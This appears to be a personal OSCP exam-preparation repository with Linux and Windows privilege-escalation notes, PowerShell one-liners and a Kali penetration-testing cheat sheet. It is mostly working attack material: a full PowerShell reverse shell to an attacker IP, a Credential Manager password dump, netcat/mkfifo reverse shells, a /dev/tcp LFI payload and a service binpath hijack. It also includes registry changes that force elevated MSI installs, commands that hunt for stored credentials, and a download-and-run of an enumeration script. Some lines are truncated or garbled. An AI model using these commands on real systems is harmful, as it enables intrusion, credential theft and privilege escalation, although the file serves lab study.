├── Linux Privesc
├── Powershell_One_Liners.txt
├── README.md
├── Windows Privesc
└── cheat-sheet.txt
/Linux Privesc:
--------------------------------------------------------------------------------
1 | # Linux Enumeration for Escalation Root Access
2 |
3 | ### os version
4 | Command Result
5 | uname -a Print all available system information
6 | uname -r Kernel release
7 | uname -n System hostname
8 | hostname As above
9 | uname -m Linux kernel architecture (32 or 64 bit)
10 | cat /proc/version Kernel information
11 | cat /etc/*-release Distribution information
12 | cat /etc/issue As above
13 | cat /proc/cpuinfo CPU information
14 | df -a File system information
15 |
16 | ----
17 |
18 |
19 | ### Users & Groups:
20 |
21 | Command Result
22 | cat /etc/passwd List all users on the system
23 | cat /etc/group List all groups on the system
24 | cat /etc/shadow Show user hashes – Privileged command
25 | grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' List all super user accounts
26 | finger Users currently logged in
27 | pinky As above
28 | users As above
29 | who -a As above
30 | w Who is currently logged in and what they’re doing
31 | last Listing of last logged on users
32 | lastlog Information on when all users last logged in
33 | lastlog –u %username% Information on when the specified user last logged in
34 |
35 | ---
36 |
37 |
38 | ### User & Privilege Information:
39 |
40 | Command Result
41 | whoami Current username
42 | id Current user information
43 | cat /etc/sudoers Who’s allowed to do what as root – Privileged command
44 | sudo -l Can the current user perform anything as root
45 |
46 | ----
47 |
48 | ### Environmental Information:
49 |
50 | Command Result
51 | env Display environmental variables
52 | set As above
53 | echo $PATH Path information
54 | history Displays command history of current user
55 | pwd Print working directory, i.e. ‘where am I’
56 | cat /etc/profile Display default system variables
57 |
58 | ---
59 |
60 | ### Interesting Files:
61 |
62 | Command Result
63 | find / -perm -4000 -type f 2>/dev/null Find SUID files
64 | find / -uid 0 -perm -4000 -type f 2>/dev/null Find SUID files owned by root
65 | find / -perm -2000 -type f 2>/dev/null Find files with GUID bit set
66 | find / -perm -2 -type f 2>/dev/null Find world-writable files
67 | find / -perm -2 -type d 2>/dev/null Find word-writable directories
68 | find /home –name *.rhosts -print 2>/dev/null Find rhost config files
69 | ls -ahlR /root/ See if you can access other user directories to find interesting files – Privileged command
70 | cat ~/.bash_history Show the current users’ command history
71 | ls -la ~/.*_history Show the current users’ various history files
72 | ls -la ~/.ssh/ Check for interesting ssh files in the current users’ directory
73 | ls -la /usr/sbin/in.* Check Configuration of inetd services
74 | grep -l -i pass /var/log/*.log 2>/dev/null Check log files for keywords (‘pass’ in this example) and show positive matches
75 | find /var/log -type f -exec ls -la {} \; 2>/dev/null List files in specified directory (/var/log)
76 | find /var/log -name *.log -type f -exec ls -la {} \; 2>/dev/null List .log files in specified directory (/var/log)
77 | find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} \; 2>/dev/null List .conf files in /etc (recursive 1 level)
78 | ls -la /etc/*.conf As above
79 | find / -maxdepth 4 -name *.conf -type f -exec grep -Hn password {} \; 2>/dev/null Find .conf files (recursive 4 levels) and output line number where the word password is located
80 | lsof -i -n List open files (output will depend on account privileges)
81 |
82 | ----
83 |
84 | ### Service Information:
85 |
86 | Command Result
87 | ps aux | grep root View services running as root
88 | cat /etc/inetd.conf List services managed by inetd
89 | cat /etc/xinetd.conf As above for xinetd
90 |
91 | ----
92 |
93 | ### Jobs/Tasks:
94 |
95 | Command Result
96 | crontab -l -u %username% Display scheduled jobs for the specified user – Privileged command
97 | ls -la /etc/cron* Scheduled jobs overview (hourly, daily, monthly etc)
98 | ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null What can ‘others’ write in /etc/cron* directories
99 | top List of current tasks
100 |
101 | ---
102 |
103 | ### Networking, Routing & Communications:
104 |
105 | Command Result
106 | /sbin/ifconfig -a List all network interfaces
107 | cat /etc/network/interfaces As above
108 | arp -a Display ARP communications
109 | route Display route information
110 | cat /etc/resolv.conf Show configured DNS sever addresses
111 | netstat -antp List all TCP sockets and related PIDs (-p Privileged command)
112 | netstat -anup List all UDP sockets and related PIDs (-p Privileged command)
113 | iptables -L List rules – Privileged command
114 | cat /etc/services View port numbers/services mappings
115 |
116 | ----
117 |
118 | ### Programs Installed:
119 |
120 | Command Result
121 | dpkg -l Installed packages (Debian)
122 | rpm -qa Installed packages (Red Hat)
123 | sudo -V Sudo version – does an exploit exist?
124 | httpd -v Apache version
125 | apache2 -v As above
126 | apache2ctl (or apachectl) -M List loaded Apache modules
127 | mysql --version Installed MYSQL version details
128 | perl -v Installed Perl version details
129 | java -version Installed Java version details
130 | python --version Installed Python version details
131 | ruby -v Installed Ruby version details
132 | find / -name %program_name% 2>/dev/null (i.e. nc, netcat, wget, nmap etc) Locate ‘useful’ programs (netcat, wget etc)
133 | which %program_name% (i.e. nc, netcat, wget, nmap etc) As above
134 |
135 | ----
136 |
137 | ### Common Shell Escape Sequences:
138 |
139 | Command Program(s)
140 | :!bash vi, vim
141 | :set shell=/bin/bash:shell vi, vim
142 | !bash man, more, less
143 | find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \; find
144 | awk 'BEGIN {system("/bin/bash")}' awk
145 | --interactive nmap
146 | perl -e 'exec "/bin/bash";' Perl
147 |
--------------------------------------------------------------------------------
/Powershell_One_Liners.txt:
--------------------------------------------------------------------------------
1 | #launch a reverse shell using native .net in powershelll
2 | $client = New-Object System.Net.Sockets.TCPClient("10.10.14.6",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
3 |
4 |
5 | #document all tasks in task scheduler
6 | $outcsv = "c:\temp\taskdef.csv" ; Get-ScheduledTask | ForEach-Object { [pscustomobject]@{ Name = $_.TaskName; Path = $_.TaskPath;LastResult = $(($_ | Get-ScheduledTaskInfo).LastTaskResult);NextRun = $(($_ | Get-ScheduledTaskInfo).NextRunTime);Status = $_.State;Command = $_.Actions.execute;Arguments = $_.Actions.Arguments }} |Export-Csv -Path $outcsv -NoTypeInformation -Force
7 |
8 | #dump all windows credential manager creds
9 | [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
10 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # OSCP
--------------------------------------------------------------------------------
/Windows Privesc:
--------------------------------------------------------------------------------
1 | # Windows Priv escalation
2 |
3 | ### Stored credentials
4 | - Search for credentials within:
5 | ```
6 | c:\unattend.xml
7 | Unattend credentials are stored in base64 and can be decoded manually with base64:
8 | user@host $ base64 -d cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=
9 | ```
10 |
11 | - Metasploit Framework enum_unattend module and gather credentials module:
12 | ```
13 | http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/enum_unattend.rb
14 | http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/post/windows/gather/credentials/gpp.rb
15 |
16 |
17 | c:\sysprep.inf
18 | c:\sysprep\sysprep.xml
19 | dir c:\*vnc.ini /s /b
20 | dir c:\*ultravnc.ini /s /b
21 | dir c:\ /s /b | findstr /si *vnc.ini
22 |
23 | findstr /si password *.txt | *.xml | *.ini
24 | findstr /si pass *.txt | *.xml | *.ini
25 | ```
26 |
27 | - Password recovery programs - small - RDP, Mail, IE, VNC, Dialup, Protected Storage...
28 | ```
29 | http://www.nirsoft.net/password_recovery_tools.html
30 | Dumping cleartext credentials with mimikatz
31 | http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html
32 | ```
33 | ---------------------
34 |
35 | ### Reg Query
36 |
37 |
38 | #### VNC Stored:
39 | - reg query "HKCU\Software\ORL\WinVNC3\Password"
40 |
41 | #### Windows Autologin:
42 | - reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
43 |
44 |
45 | #### SNMP Parameters:
46 | - reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
47 |
48 |
49 | ### Putty clear text proxy credentials:
50 | - reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"
51 |
52 |
53 | #### Search the registry - copy (pipe) to the clipboard (optional)
54 | - reg query HKLM /f password /t REG_SZ /s [ |clip]
55 | - reg query HKCU /f password /t REG_SZ /s [ |clip]
56 |
57 | --------------------
58 | ### Change the upnp service binary
59 |
60 | ```
61 | sc qc upnphostsc config upnphost binpath= "net user /add"
62 | sc config upnphost obj= ".\LocalSystem" password =""
63 | net stop upnphost
64 | net start upnphost
65 | ```
66 |
67 | ----------------------
68 | ## Local Exploit
69 |
70 | ### Vulnerability Privilege Escalation
71 |
72 |
73 | #### Windows kernel privilege escalation
74 | - KiTrap0D
75 | - http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip
76 |
77 | - Tomcat Windows privilege escalation
78 | - http://www.abysssec.com/blog/2008/11/27/tomcat-jrun-privilege-escalation-windows
79 |
80 | - NtGdiEnableEudc Exploit (MS11-011) - windows XP SP0-3
81 | 16262,platforms/windows/dos/16262.,"MS11-011(CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability
PoC",2011-03-01,"Nikita Tarakanov",windows,dos,0
82 |
83 | ```
84 | http://www.securityfocus.com/bid/46136/exploit
85 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0045
86 | http://downloads.securityfocus.com/vulnerabilities/exploits/46136.c
87 | http://cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html
88 | http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
89 | ```
90 |
91 | - Service Tracing Key (MS10-059)
92 | ```
93 | http://www.securityfocus.com/bid/42269/exploit
94 | http://www.argeniss.com/research/ARGENISS-ADV-081002.txt
95 | http://www.securityfocus.com/data/vulnerabilities/exploits/Chimichurri.zip
96 | http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2554
97 | ```
98 |
99 | - Registry Symlink Vuln (MS10-021)
100 | - No Public Exploit - VuPEN membership only
101 |
102 | - Ryujin - ADF.sys priv esc - ms11-080
103 |
104 | ```
105 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2005
106 | http://www.exploit-db.com/exploits/18176
107 | pyinstaller - http://www.pyinstaller.org/
108 | py2exe - http://www.py2exe.org/
109 | ```
110 |
111 | - UAC Bypass priv esc
112 | ```
113 | http://www.exploit-db.com/exploits/15609
114 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4398
115 | http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
116 | http://www.securityfocus.com/bid/45045/info
117 | ```
118 |
119 | Additional References and sources and other links:
120 | Encyclopaedia of Windows Privilege escalation - Brett Moor
121 | http://www.ruxcon.org.au/2011-talks/encyclopaedia-of-windows-privilege-escalation/
122 |
--------------------------------------------------------------------------------
/cheat-sheet.txt:
--------------------------------------------------------------------------------
1 | ___ __ ___ _ __ ___| |__ ___ __ _| |_ ___| |__ ___ ___| |_
2 | / _ \/ __|/ __| '_ \ / __| '_ \ / _ \/ _` | __| / __| '_ \ / _ \/ _ \ __|
3 | | (_) \__ \ (__| |_) | | (__| | | | __/ (_| | |_ \__ \ | | | __/ __/ |_
4 | \___/|___/\___| .__/ \___|_| |_|\___|\__,_|\__| |___/_| |_|\___|\___|\__|
5 | |_|
6 |
7 | _ _ _
8 | | |_ _ __ _ _ | |__ __ _ _ __ __| | ___ _ __
9 | | __| '__| | | | | '_ \ / _` | '__/ _` |/ _ \ '__|
10 | | |_| | | |_| | | | | | (_| | | | (_| | __/ |
11 | \__|_| \__, | |_| |_|\__,_|_| \__,_|\___|_|
12 | |___/
13 |
14 | #remmeber most of these need root but I've not included SUDO because Kali doesn't feature this :)
15 |
16 | ##############################
17 | #OSCP Cheat Sheet by Dan Card#
18 | ##############################
19 | #Kali Setup & Command Reference
20 | #DRAFT not tested
21 |
22 | ####################
23 | # UPDATE KALI
24 | ###################
25 | ## ok so you probably want to run two vms for the pwk and maybe the exam one pwk vanilla 32 bit which is not updated and one 2018 KALI with the latest updates
26 |
27 |
28 | apt-get update; apt-get upgrade
29 |
30 |
31 | #############START POSTGRESQL on BOOT####################
32 | sudo update-rc.d postgresql enable
33 |
34 | ##################################################
35 | # SETUP VM TOOLS FOR SHARED FOLDERS AND COPY PASTA
36 | ##################################################
37 |
38 | apt-get install openvmfstools
39 | There are shell scripts to run to enable this
40 |
41 | ##############################
42 | # Update Python
43 | ##############################
44 | apt-get install python-dev
45 | apt-get instal python-pip
46 | apt-get install python2.7-dev
47 | apt-get install python2.7-pip
48 | apt-get install python3-dev
49 | apt-get install python3-pip
50 |
51 |
52 | #######################
53 | #Install PIP modules
54 | #######################
55 |
56 | pip install netifaces
57 |
58 | ####################
59 | #Terminal Management
60 | # The PWK image already includes terminator
61 | ####################
62 | #User terminator, Byobu.co and or TMUX
63 |
64 | apt-get install terminator
65 | apt-get install tmux
66 | apt-get install byobu
67 |
68 |
69 | ###############
70 | # SETUP MSF
71 | ###############
72 | #setup postgreSQL to start by default
73 | update-rc.d postgresql enable
74 | #rebuild search cache
75 | msfdb init
76 | msfdb status
77 | msfconsole
78 | db_status
79 | db_connect msf:msf@127.0.0.1:5432/msf
80 | db_rebuild_cache
81 | db_status
82 |
83 | #setup global variables in MSF
84 | set GLHOST 10.10.10.10
85 | set GLPORT 4444
86 |
87 | ############START POSTGRESQL on BOOT #############
88 | systemctl enable ssh
89 | systemctl enable postgresql
90 |
91 | #########################
92 | #SIMPLE PYTHON WEB SERVER
93 | ########################
94 | python -m SimpleHTTPServer 80
95 |
96 | #####################################
97 | # Get all the tools into /pentest
98 | #####################################
99 | mkdir /pentest
100 | mkdir /pentest/tools
101 | mkdir /pentest/oscp
102 | mkdir /pentest/htb
103 |
104 | ####################################
105 | # ENUMERATION
106 | #####################################
107 | ###find ip and arpy things
108 | netdiscover -i eth0
109 | #add things to host files if that's appropriate
110 |
111 | #NMAP ALL THE THINGS
112 |
113 | nmap -Pn -sS -sV -T4 -O -A -oA -v -v -v -v [targetname_tcpq] [targetIP/name]
114 | nmap -Pn -sU -sV -T4 -O -A -oA -v -v -v -v [targetname_udpq] [targetIP/name]
115 | nmap -Pn -p- -sS -sV -T4 -O -A -oA -v -v -v -v [targetname_tcpf] [targetIP/name]
116 | nmap -Pn -p- -sU -sV -T4 -O -A -oA -v -v -v -v [targetname_tcpf] [targetIP/name]
117 |
118 | nmap -Pn -p- -sV -T4 --script *vuln* 10.11.1.220
119 |
120 | #check for SNMP
121 | ### check snmp public community string with version 1 (change as requred)
122 | snmp-check [target_ip] -c public -v 1
123 | #########if found walk it#############
124 | snmpwalk -v 1 -c public [target ip]
125 |
126 | #CHECK for TFTP (ala stuxnet)
127 | nmap -sU -p 69 --script tftp-enum.nse [taretIP/name]
128 |
129 | #################SMTP ENUMERATION######################
130 |
131 | smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.11.1.22
132 |
133 |
134 | #####################################
135 | # Web Application Enumeration Tools
136 | #####################################
137 | # run wafw00f to start with to check for application firewalls
138 | # CMSMAP for scanning content management systems
139 | # nikto for web application vulnerability scanning
140 | # wpscan for wordpress
141 | # joomscan for joomla
142 |
143 | #curl the robots.txt file
144 | curl http://[target_ip]/robots.txt
145 |
146 |
147 | #forced browsing
148 | #gobuster
149 | #install
150 | mkdir /pentest/
151 | mkdir /pentest/tools
152 | cd /pentest/tools
153 | git clone https://github.com/OJ/gobuster.git
154 |
155 | ###########################WORDPRESS SCANNING#######################################
156 | wpscan --url http://[target_ip] --enumerate p --enumerate u --enumerate t
157 |
158 | #######################
159 | ### WEB SHELLS ########
160 | #######################
161 | ##########PHP SHELLS################
162 | #PHP BASH
163 | cd /pentest/tools
164 | #https://github.com/Arrexel/phpbash
165 | git clone https://github.com/Arrexel/phpbash.git
166 | #php-reverse-shell
167 | http://pentestmonkey.net/tools/web-shells/php-reverse-shell
168 |
169 | #PHP simple command shell
170 |
171 | https://github.com/artyuum/Simple-PHP-Web-Shell/blob/master/index.php
172 | #to launch a shell use
173 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.xx 666 >/tmp/f
174 |
175 | #alternate method
176 |
177 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.xxx 4444 >/tmp/f
178 |
179 |
180 |
181 | ##########################FIREWALL#######################
182 | # on kali you can use UFW or IPTABLES to protect your attackers machine
183 |
184 | #install UFW
185 |
186 | apt-get install ufw
187 |
188 | #show the status
189 | ufw status
190 | #reset ufw to defaults
191 | ufw reset
192 |
193 | #enable the firewall
194 | ufw enable
195 |
196 |
197 |
198 | #########################GOBUSTER######################
199 | ### gobuster general command structure for a lnux server running PHP connecting via a proxy
200 | gobuster -u http://bank.htb -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html -p http://127.0.0.1:8080
201 |
202 | ######################################
203 | ######NETCAT shells on target
204 | #######################################
205 | nc [attacker_ip] 1234 -e /bin/sh
206 |
207 | #################LISTENERS#################################
208 |
209 | ####a simple netcat listener on TCP 1234
210 | nc -v -n -l -p 1234
211 |
212 | ### an msf listener
213 | msfconsole
214 |
215 | #what do you do if its BSD and doesn't have -e as an option!?
216 |
217 | mknod /tmp/backpipe p
218 | /bin/sh 0/tmp/backpipe
219 |
220 | #sweeeeet!
221 |
222 | #####################
223 | #GREP search file contents of a directory
224 | #############################################
225 | #search file contents using acase insensitive recusrive search
226 | grep -rniw /pentest/HTB/bank/balance-transfer/bank.htb/balance-transfer/ -e 'success'
227 |
228 |
229 |
230 | ##############################WEB SERVER LFI##############################
231 |
232 | #tools to help
233 | #Kadimus
234 | #https://github.com/P0cL4bs/Kadimus
235 | #remember to install dependancies
236 | ./kadimus -t https://[target]/section.php?page=php://input%00 -C \ '& /dev/tcp/10.11.0.xxx/4444 0>&1 2>&1"); ?>' -X input
237 |
238 |
239 | ##########################WINDOWS PRIV ESC
240 | #set msi's to install with admin rights
241 | REG ADD HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
242 | REG ADD HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
243 |
244 |
245 |
246 | ###################LINUX ENUMERATION#################################
247 | #ok so ideally use a tool such as linenum.sh however we need to know what to do manualy.
248 | #so first thing is first let's see who I am?
249 | whoami
250 | #now let's check my hostname
251 | hostname
252 | #now let's see what OS version I'm running
253 | uname -a # -a is important to get all
254 | ##################
255 | cat /etc/os-release
256 | lsb_release -a
257 | hostnamectl
258 |
259 | uname -r #kernel version
260 |
261 | #now let's see what access i have
262 | #######
263 |
264 | #now let's see if I can run anything with elevated access
265 | sudo -l
266 |
267 | #######################################################################################
268 | ########################## POST EXPLOITATION ##########################################
269 | #######################################################################################
270 | #########WINDOWS POST EXPLOITATION##############
271 | #rasta mouse has some scripts Sherlock and Watston (watson runs on .net 2.0) for searching for exploits for priv esc
272 | https://github.com/rasta-mouse/Watson
273 |
274 | ###############################################
275 | ######### POWER SHELL TO THE RESCUE ###########
276 | ###############################################
277 | #PowerShell One Liners
278 | #run a local script file
279 | PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1
280 | #run a command block
281 | PowerShell.exe -ExecutionPolicy UnRestricted invoke-command -scriptblock {Write-Host "Now I have a machine gun"}
282 |
283 | #POST EXPLOITATION LIVING OFF THE LAND
284 | #so go find useful system information
285 | # check this link out --- https://www.cyberciti.biz/faq/how-to-check-os-version-in-linux-command-line/
286 |
287 | hostname
288 | whoami
289 | ipconfig /all
290 | route print
291 | sytseminfo
292 | qwinsta
293 | schtasks
294 | at
295 |
296 | #--------------------look for credentials
297 | cmdkey /list
298 |
299 |
300 | #######################LINUX Remote Desktop #######################
301 | #rdesktop has a wide range of options
302 | #remote desktop with clipboard, screen name SLAVE and use 80% of the screen
303 | rdesktop -u administrator -p "Pa55w0rd1" -r PRIMARYCLIPBOARD -T SLAVE -g 80% 10.11.1.221
304 |
305 | #connect to the Windows 7 VM and mount the /tmp/ folder as a shared drive
306 |
307 | rdesktop -u offsec -p Pa55w0rd1 -r disk:Temp=/tmp/ -T PWK-W7 -g 80% 10.11.16.xx
308 |
309 |
310 | ######### LINUX POST EXPLOITATION ##############
311 | # on linux and unix systems BASH shell scripts can be useful after an initial shell has been achieved
312 |
313 |
314 | #setup a python web server on attacker
315 | #dowload LinEnum.sh from attacker to victim
316 | wget http://10.11.0.xx/LinEnum.sh
317 | #warning you might get acccess denied. if so try using the /tmp directory
318 | #execute LinEnum.sh
319 |
320 | #make this executable
321 | chmod +x LinEnum.sh
322 | ./LinEnum.sh
323 |
324 | #now we probably want to find some vulns as well
325 |
326 | #https://github.com/belane/linux-soft-exploit-suggester
327 | #https://github.com/mzet-/linux-exploit-suggester
328 |
329 |
330 | ################LINUX CAPABILITIES###################
331 |
332 | getcap -r / 2>/dev/null
333 |
334 | ################################################
335 |
336 |
337 |
338 | ###################### KERNEL EXPLOITS ################################
339 | #Look at the suggested exploits in relation to kernerl exploits
340 | #kernel exploits often require to be compiled
341 | #if you can't compile on the victim compile them locally using gcc
342 | # if you want to compile a 32 bit binary on x64 kali using "gcc -m 32"
343 |
344 | # Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)
345 | # https://www.exploit-db.com/exploits/8478/
346 | # DIRTYC0W
347 | # NELSON
348 |
349 |
350 | #######################################################################################
351 | #######################################################################################
352 | ################################## CRACKING ###########################################
353 |
354 | #Crack a zip file using john (you may need to install jumbo version of john and use the exact path to run the john binary
355 | # you need a word list either use rockyou or generate one using data you have (e.g. run strings, or ur cewl against a website etc.)
356 | #first convert the zip file to john the ripper hash format using zip2john (use rar2john for rar files)
357 | zip2john control.zip > ziphash
358 | #next we need to run john and specify the format and the hash file and provide a wordlist
359 | john --format=zip --wordlist=passwords.txt ziphash
360 |
361 | #########################SHELL UPGRDES###########################
362 | # if you have a limited shell on linux try this:
363 | #PYTHON shell
364 | python -c 'import pty; pty.spawn("/bin/bash")'
365 | python3 -c 'import pty; pty.spawn("/bin/bash")'
366 |
367 | ##################################ACTIVE DIRECTORY#################################
368 | # if you ever need to use the gui to seach AD without tools installed use this:
369 | %SystemRoot%\SYSTEM32\rundll32.exe dsquery,OpenQueryWindow
370 |
371 |
372 | #ACTIVE DIRECTORY ENUMERATION
373 | #RPCLIENT with NULL Session bind
374 |
375 | #RID ENUMERATION
376 | # get RID ENUM from trusted SEC - https://github.com/trustedsec/ridenum
377 | git clone https://github.com/trustedsec/ridenum
378 | # neeeds python-pexpect
379 | #may needs creds is NULL sessions isn't enabled
380 | python ridenum.py 10.11.1.220 500 50000
381 |
382 | ###DNS ENUMERATION
383 | dnsrecon -d thinc.local -n 10.11.1.xx -D /usr/share/wordlists/subdomains-10000.txt -t std,srv,axfr -c /pentest/oscp/dns.csv
384 |
385 |
386 | ######################WEB TOOLS TO HELP YOU ON THE JOURNEY########################
387 | #CYBER CHEF from GCHQ
388 | https://gchq.github.io/CyberChef/
389 |
390 | #The magic tool will analyse data and try and work out its format e.g. type/cat a zip file and copy it into the input
391 | https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false)
392 |
393 |
394 | ####################### Running BURP Suite when the target has a certificate issue#########################
395 | #disable java SNI for when your target site doesn't appear in burp suite and its running TLS
396 | java -Djsse.enableSNIExtension=false -jar burpsuite_community_v1.7.36.jar
397 |
398 |
399 | #############LINUX TCP DUMP#################
400 | #DUMP CLIENT CONNECTION HTTP HEADERS
401 | #change the port to suite the server you are abusing
402 | tcpdump -A -s 0 'tcp dst port 10443 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
403 |
404 |
405 |
406 |
--------------------------------------------------------------------------------